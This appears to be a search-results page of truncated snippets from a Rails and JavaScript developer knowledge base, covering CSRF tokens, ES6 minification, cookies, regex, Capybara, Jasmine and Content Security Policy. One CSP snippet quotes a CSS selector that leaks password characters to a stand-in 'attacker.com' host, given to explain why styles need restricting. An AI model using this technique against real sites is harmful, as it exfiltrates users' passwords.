...Add <%= csrf_meta_tag %> into your layout's head Put this into a JavaScript file that is always loaded (like your application.js -- or another file you add to the javascript...
...example is storing a transition duration as a CSS custom property to read it from JavaScript. By converting the value like this, you can ensure your JavaScript will always get milliseconds...
(@foo or @bar) So you need to replace a hook like this: AfterStep('~@javascript') do ... end With this: AfterStep('not @javascript') do ... end Also grep your entire project for...
DirectUpload allows you to upload files to your file storage without having to wait for the form to submit. It...
...test runner supports mocking a module's dependencies. This has some drawbacks for frontend JavaScript that targets the browser: Jest only runs in Node.js. This means your specs can no...
...contributions to the gem dist/ usually contains files rendered ready for "distribution", e.g. minified JavaScript files src/ usually contains the raw "source" files, e.g. split up into many files, before...
...a same_site option, i.e. cookies[:my_cookie] = { value: 'my-value', same_site: 'None' } JavaScript (using js-cookie) Make sure you're using at least 2.2.0. Set a cookie with...
...you can use most ES6 features without a build step. Just deliver your plain JavaScript without transpilation through Babel or TypeScript, and modern browsers will run them natively. Features supported...
...Rails with the assets pipeline (sprockets) you are probably using Uglifier to minify your JavaScript. Uglifier can minify some, but not all ES6 language features. Check if you're affected...
not matched Info As of 2024, possessive quantifiers are not supported in JavaScript. There's a TC 39 proposal that's stuck in stage...
...assets that we don't need allow_any_instance_of(ActionView::Base).to receive(:javascript_include_tag).and_return('script') allow_any_instance_of(ActionView::Base).to receive(:stylesheet_link...
...will have two CSRF tokens: A in the . This is required so client-side JavaScripts may make POST, PATCH, DELETE requests. An within each form. Since Rails 5 this token...
...lambda do |request| (request.session.id || SecureRandom.base64(16)).to_s end Then, find all occurrences of javascript_include_tag, javascript_tag, javascript_pack_tag etc. and add nonce: true. Also, make sure...
...don't have any other inline scripts in your application that do not use javascript_tag. Why this works The main point of this CSP is to disallow user content...
...prompt will have been closed already and cannot be brought back. Also, any JavaScript code placed after the alert will be executed. Automatically closing user prompts happens when performing...
...missing an href attribute. This will probably happen to you every now and then on JavaScript-heavy applications. An example would be an AngularJS application where the following HTML actually...
...link placeholders. So Capybara at least adheres to the HTML spec. :) See also Triggering JavaScript when an element is clicked Capybara can find links and fields by their [aria-label...
...RegExp to interpret text as Shift JIS encoded which you probably don't want. JavaScript There is no modifier to make the dot match line feeds. You need to write...
...proposal that's stuck in Stage 1. While there is a /m modifier in JavaScript, it only changes the meaning of ^ and $. Perl You can make the dot match line...
...but the most important ones are: Sources: default-src: fallback for all other *-src script-src: JavaScript style-src: CSS font-src: fonts img-src: images object-src: sources for plugins (e.g...
input[type="password"][value$="a"] { background-image: url("http://attacker.com/passwords-ends-with/a"); } Problem: Some JavaScript libraries (editors etc.) use inline styles. object-src Also important. If not restricted, ...
...redirect with GET as expected. This is also what Unpoly or the Rails unobtrusive JavaScript adapter does when you annotate a link with data-method="PATCH...
...using a tool like Unpoly you might want to set autocomplete="off" in the JavaScript that also initializes your date picker library: up.compiler('.date-picker', function(input) { input.setAttribute('autocomplete', 'off...
}) This way users with JavaScript disabled (and hence no calendar popups) will still get the browser's default autocomplete behavior...
...your footprint small. Check your JS bundles Webpack(er): Analyze the size of your JavaScript components
...event on window. It will be emitted for all uncaught errors in the current JavaScript VM: window.addEventListener('error', function(event) { console.log("Got an uncaught error: ", event.error) }) Tip Testing tools like...
...concept, like a Ruby class attribute (snake_case) that is also exposed to the JavaScript world (camelCase). # This query matches "foobar", "foo-bar" and "foo_bar" # The query is case...
When using the asset pipeline your assets (images, javascripts, stylesheets, fonts) live in folders inside app: app/assets/fonts app/assets/images app/assets/javascripts app/assets/stylesheets With the asset pipeline, you can use the...
...power of Ruby to generate assets. E.g. you can have ERB tags in your JavaScript. Or you can have an ERB template which generates Haml which generates HTML. You can...
Jasmine is a great way to unit test your JavaScript components without writing an expensive end-to-end test for every small requirement. After we integrated Jasmine into a Rails...
...attribute will become standard soon. Feel free to use to feel future-proof. On JavaScript file objects, webkitRelativePath is supported similarly to webkitdirectory in HTML. As a fallback for older...
...E.g. console.log("Current string:", string, "Current number:", 12) Your output can have hyperlinks to JavaScript objects E.g. console.log("Check out the current %o, it's great", location) Displaying tabular data...